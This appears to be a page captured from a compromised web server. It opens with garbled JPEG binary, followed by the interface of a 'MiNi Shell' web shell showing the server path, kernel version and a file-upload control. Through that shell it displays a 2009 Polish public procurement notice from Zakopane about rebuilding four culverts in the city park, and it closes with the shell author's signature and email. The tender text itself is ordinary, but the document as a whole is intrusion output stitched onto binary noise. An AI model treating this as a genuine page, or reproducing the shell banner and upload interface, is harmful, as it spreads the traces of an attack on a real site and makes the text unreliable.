JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090410/101936-N-2009.html

<p class="kh_header"><b>Zakopane: ZP/341/18/08 dokumentacja i remont przepustów w Parku Miejskim w Zakopanem</b><br>
<b>Numer ogłoszenia: 101936 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/18/08 dokumentacja i remont przepustów w Parku Miejskim w Zakopanem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty budowlane polegające na wykonaniu dokumentacji projektowo-kosztorysowej i  robót budowlanych na zadaniu nr 47/08 o nazwie: Remont i przebudowa 4 przepustów w Parku Miejskim w Zakopanem, wykonywany w  ramach usuwania szkód powstałych w wyniku powodzi w lipcu 2008r.

Ogólna charakterystyka przedmiotu zamówienia: 

Projekt i wykonanie robót obejmuje 4 przepusty w Parku Miejskim w m. Zakopane, gm. Zakopane:
Przepust 1 - km 0+335 - 0+338,5
Przepust 2 - km 0+295,5 - 0+299
Przepust 3 - km 0+232 - 0+235,5
Przepust 4 - km 0+204 - 0+207,5
Zakres prac obejmuje udrożnienie koryta na odcinkach, gdzie usytuowane są przepusty przez zaprojektowanie i wykonanie trwałej konstrukcji o parametrach geometrycznych zbliżonych do istniejących parametrów przekroczeń. 
Przepust 3 będzie składał się z 5 żelbetowych elementów prefabrykowanych, o przekroju ramowym. Szerokość w dnie  będzie wynosiła 1,5-2,0 m, a wysokość 1,5 m (np. element prefabrykowany RPP KAP 1101 lub KAP 1102 firmy Kaprin). Wylot i wlot przepustu będzie  odbudowany przyczółkami żelbetowymi.  Przepust przebiega pod drogą wykorzystywaną przez pojazdy wykonujące roboty konserwatorskie w Parku Miejskim. Przepust należy odbudować w sposób umożliwiający poruszanie się po nim pojazdów o ciężarze całkowitym do 3,5 t.
W miejscu istniejących przepustów 1, 2, 4 przewiduje się ich rozbiórkę i zastąpienie istniejącej konstrukcji stalowymi kładkami przeznaczonymi dla ruchu pieszych, których pobocza będą zabezpieczone ozdobnymi barierkami. Nawierzchnia przyczółków zostanie wyłożona kostką brukową lub granitową. Przyczółki kładek powinny być usytuowane poza oddziaływaniem przepływu Q1%.
Łącznie z przebudową przepustów przewiduje się poprawne ułożenie mediów (rury ciepłownicze, eNN). Przewody nie powinny przecinać światła między dnem, skarpami
i kładką.
Po wykonaniu prac związanych z przebudową przepustów należy uzupełnić ubezpieczenie brzegów w sąsiedztwie przeprawy oraz zieleń i ścieżki parkowe zniszczone w czasie prowadzenia prac.
Wykonawca podejmujący się realizacji przedmiotu zamówienia zobowiązany będzie do:
1.	Sporządzenia bądź pozyskania aktualnej mapy sytuacyjno-wysokościowej 
i ewidencyjnej.
2.	Przygotowania kompletnego wniosku do zgłoszenia robót budowlanych, niezbędnych decyzji, w tym pozwolenia na budowę, w oparciu o obowiązujące przepisy (Prawo budowlane - Dz. U. z 2006r. Nr 156 poz. 1118 z późn. zm.) lub innej formy stosując przepisy ustawy z dnia 11.08.2001r. o szczególnych zasadach odbudowy, remontów i rozbiórek obiektów budowlanych zniszczonych lub uszkodzonych w wyniku działań żywiołów - Dz. U. z dnia 14.08.2001r. Nr 84, poz. 906 z późn. zm.
3.	Opracowania dokumentacji projektowej wykonawczej z uwzględnieniem wymagań Rozporządzenia (9) dla wszystkich branż w formie planów, rysunków lub innych dokumentów umożliwiających jednoznaczne określenie rodzaju i zakresu robót budowlanych, dokładną lokalizację i uwarunkowania. Projekt musi być przedstawiony do akceptacji Zamawiającego.
4.	Uzyskanie wymaganych prawem stosownych uzgodnień, postanowień lub decyzji (w tym uzgodnień dokumentacji z Regionalnym Zarządem Gospodarki Wodnej).
5.	Opracowanie kosztorysu inwestorskiego.
6.	Opracowania i przedstawienia Zamawiającemu do zatwierdzenia Szczegółowych Specyfikacji Technicznych na wszystkie elementy realizowanych robót.
7.	Realizacji robót w oparciu o zatwierdzoną przez Zamawiającego dokumentację projektową po wytyczeniu robót przez uprawnionego geodetę Wykonawcy.
8.	Prowadzenia pomiarów kontrolnych zgodnie z wymogami SST wraz z pobieraniem próbek i dostarczaniem ich organom kontrolnym, a wyniki tych badań 
do akceptacji przez Inspektora Nadzoru (określenie klasy betonu, aprobaty techniczne dla zastosowanych materiałów).
9.	Przygotowania harmonogramu badań kontrolnych w odniesieniu 
do harmonogramu realizacji robót.
10.	Prowadzenia dziennika robót i wykonywania obmiarów ilości zrealizowanych robót.
11.	Przygotowania rozliczenia końcowego robót i sporządzenia 2 egz. Operatu powykonawczego, który winien zawierać: umowę, ofertę, umowy 
z podwykonawcami, harmonogram, tabele elementów rozliczeniowych, polisę ubezpieczeniową, protokół badań laboratoryjnych (jeżeli konieczne), deklaracje zgodności materiałów, aprobaty, sprawozdanie techniczne Wykonawcy, geodezyjną inwentaryzację powykonawczą, dziennik budowy, ocenę techniczną realizacji umowy, rozliczenie finansowe, potwierdzenie zakończenia odbioru robót, oświadczenia uprawnionych kierowników robót o wykonaniu zadania zgodnie 
z przepisami, projektem oraz oświadczenie o uprzątnięciu terenu budowy oraz terenów sąsiednich (w razie korzystania).
12.	Sprawowania nadzoru autorskiego nad realizowanymi robotami.
13.	Przekazania zrealizowanych robót administratorowi, któremu służyła realizacja - zarządcy Parku Miejskiego.
14.	Sporządzenia inwentaryzacji geodezyjnej powykonawczej.
Realizacja powyższego zakresu robót winna być wykonana w oparciu o obowiązujące przepisy przez Wykonawcę posiadającego stosowne doświadczenie i potencjał wykonawczy oraz przez osoby o odpowiednich kwalifikacjach zawodowych 
i doświadczeniu zawodowym.
Wykonawca udzielą co najmniej 36-cio miesięcznej gwarancji na wykonane prace projektowe i  roboty budowlane objęte przedmiotowym zamówieniem,

Zamawiający ustanowi nadzór inwestorski na wykonaniem wszystkich robót objętych zadaniem..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.24.64.00-7, 74.23.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości  6.300,00 zł  ( słownie: sześć tysięcy trzysta  złotych)

2.	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2) poręczeniach bankowych;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn.zm.).

3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85124047481111000048718666 Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj04 maja   2009r. do godz.  12°°
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj 04 maja  2009r.do godz. 12°° w  Biurze  ds. zamówień publicznych pok. nr 8 /parter/.
        
  UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

4.	ZWROT WADIUM : 
1) Zamawiający zwraca niezwłocznie wadium, jeżeli:
a) upłynął termin związania ofertą;
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy.
 c) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
      2)  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy: 
a) który wycofał ofertę przed upływem terminu składania ofert;
b) który został wykluczony z postępowania;
c) którego oferta została odrzucona.
3)   Zamawiający żąda  ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ppkt 2 lit. b i c  jeżeli w wyniku  ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego 
4) Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

      Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na  
      wezwanie, o którym mowa w art. 26 ust. 3ustawy  nie złożył dokumentów lub oświadczeń, o  
      których mowa w art. 25 ust. 1 ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z 
      przyczyn nieleżących po jego stronie. 
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art.22 ust.1 ustawy Prawo zamówień publicznych tj.:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia, lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 
      - wykonawca musi wykazać ,że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego  
 postępowania , a jeżeli okres  prowadzenia działalności  jest krótszy- w tym okresie wykonał co najmniej 2 roboty o tożsamym charakterze z przedmiotem zamówienia tj.:  wykonał co najmniej 2 roboty  każda  robota polegająca na wykonaniu robót związanych  z zaprojektowaniem i wykonaniem remontu, przebudowy lub odbudowy budowli hydrotechnicznych o wartości nie mniejszej niż 470 000  PLN(słownie: czterysta siedemdziesiąt tysięcy PLN) każda, w tym dokumentacji projektowo - kosztorysowej .  
  

- wykonawca musi wykazać ,że dysponuje lub będzie dysponował osobami  posiadającymi odpowiednie kwalifikacje potrzebne do prawidłowego wykonania zamówienia w tym musi wykazać ,że:
1.	  zapewnią opracowanie dokumentacji projektowej  przez osoby, posiadające uprawnienia budowlane w specjalności konstrukcyjno - budowlanej  bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, umożliwiające wykonywanie funkcji projektanta obiektów budownictwa hydrotechnicznego, należące do właściwej izby Inżynierów Budownictwa, 
2.	zapewnią opracowanie branżowej dokumentacji projektowej   przez osoby, posiadające uprawnienia budowlane w specjalności instalacji sanitarnych bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, 
3.	zapewnią kierowanie zleconymi robotami przez osoby, posiadające uprawnienia budowlane w specjalności konstrukcyjno - budowlanej  
bez ograniczeń lub odpowiednich zapewniających możliwość kierowania 
i nadzorowania robotami budowlanymi obiektów hydrotechnicznych  wydanych na podstawie wcześniejszych  przepisów, należące do właściwej Izby Inżynierów Budownictwa, 
4.zapewnią kierowanie zleconymi robotami branżowymi przez osoby, posiadające uprawnienia budowlane w specjalności instalacji sanitarnych  
bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, należące do właściwej Izby Inżynierów Budownictwa

3)	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;
    - wykonawca musi wykazać się posiadaniem  środków     finansowych lub zdolnością    
          kredytową w wysokości nie mniejszej niż  150.000,00  zł
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych
Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.aktualny odpis z właściwego rejestru , albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru , lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. aktualne  zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert;
3.aktualną informację  z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu   
    składania ofert;
4.aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5.	podpisane oświadczenie o spełnianiu warunków, stanowiące załącznik nr 2 do niniejszej siwz,

6.	 na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć          
            do    oferty  wykaz ( należy wypełnić   załącznik nr 5    do  niniejszej  siwz) 
            wykonanych w   okresie ostatnich 5 lat przed dniem wszczęcia niniejszego  
            postępowania , a jeżeli okres  prowadzenia działalności  jest krótszy- w tym okresie) z    
            który będzie potwierdzał, że wykonawca  wykonał  co najmniej  2 roboty o zakresie  
            podobnym swoim rodzajem i wartością robotą  stanowiącym przedmiot zamówienia tj. każda  robota polegała na wykonaniu robót związanych  z zaprojektowaniem i wykonaniem remontu, przebudowy lub odbudowy budowli hydrotechnicznych o wartości nie mniejszej niż 470 000  PLN(słownie: czterysta siedemdziesiąt tysięcy PLN) każda, w tym dokumentacji projektowo - kosztorysowej .  



Wykonawca zobowiązany jest do powyższego wykazu załączyć dokumenty ( np.: referencje) potwierdzające, że   podane  w wykazie  roboty  zostały wykonane należycie. 

7.wypełniony druk oferty stanowiący załącznik nr 3 do niniejszej siwz(wykonawca może założyć ofertę na własnym formularzu, lecz jego  treść i układ muszą być zgodne z formularzem załączonym do siwz).

8. wykaz osób( należy wypełnić załącznik nr 6 do niniejszej siwz) , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności lub  pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa , wykonawca wskazał osoby, którymi będzie dysponował.
 Z wykazu lub  pisemnego zobowiązania innego podmiotu musi wynikać , że dysponuje lub będzie dysponował  osobami  które : 
1.	   posiadają uprawnienia budowlane w specjalności konstrukcyjno - budowlanej  bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, umożliwiające wykonywanie funkcji projektanta obiektów budownictwa hydrotechnicznego, należące do właściwej izby Inżynierów Budownictwa, 
2.	zapewnią opracowanie branżowej dokumentacji projektowej   przez osoby, posiadające uprawnienia budowlane w specjalności instalacji sanitarnych bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, 
3.	zapewnią kierowanie zleconymi robotami przez osoby, posiadające uprawnienia budowlane w specjalności konstrukcyjno - budowlanej  
bez ograniczeń lub odpowiednich zapewniających możliwość kierowania 
i nadzorowania robotami budowlanymi obiektów hydrotechnicznych  wydanych na podstawie wcześniejszych  przepisów, należące do właściwej Izby Inżynierów Budownictwa, 
4.zapewnią kierowanie zleconymi robotami branżowymi przez osoby, posiadające uprawnienia budowlane w specjalności instalacji sanitarnych  
bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, należące do właściwej Izby Inżynierów Budownictwa



 Wykonawca zobowiązany jest do powyższego wykazu załączyć kserokopie uprawnień  oraz kserokopie  aktualnej przynależności do właściwej Izby Inżynierów Budownictwa  


9. na  potwierdzenia  znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający wymaga  załączenia do oferty  informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków     finansowych lub zdolność kredytową wykonawcy w wysokości nie mniejszej niż 150.000,00-   zł ( słownie: sto pięćdziesiąt  tysięcy   złotych ) wystawionej nie   wcześniej niż 3   miesiące przed upływem terminu składania ofert,



XIV  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w :
	1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pktXIII siwz
	1)	pkt 1, 2 i 4 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
	2)	pkt 3 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.

2. Dokumenty, o których mowa w ust. 1 pkt 1 lit. a i c oraz pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ust. 1 pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio

UWAGA! 
Dokumenty mogą być przedstawione w formie kopii  (kserokopii)  poświadczonych za zgodność z oryginałem  przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Przetargi - postępowania poniżej progów unijnych.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji
Urzad Miasta Zakopane
ul. Kosciuszki13
34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 12:00, miejsce: Biuro ds zamówien publicznych pok.8
Urzad Miasta Zakopane
ul. Kosciuszki13
34-500 Zakopane.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com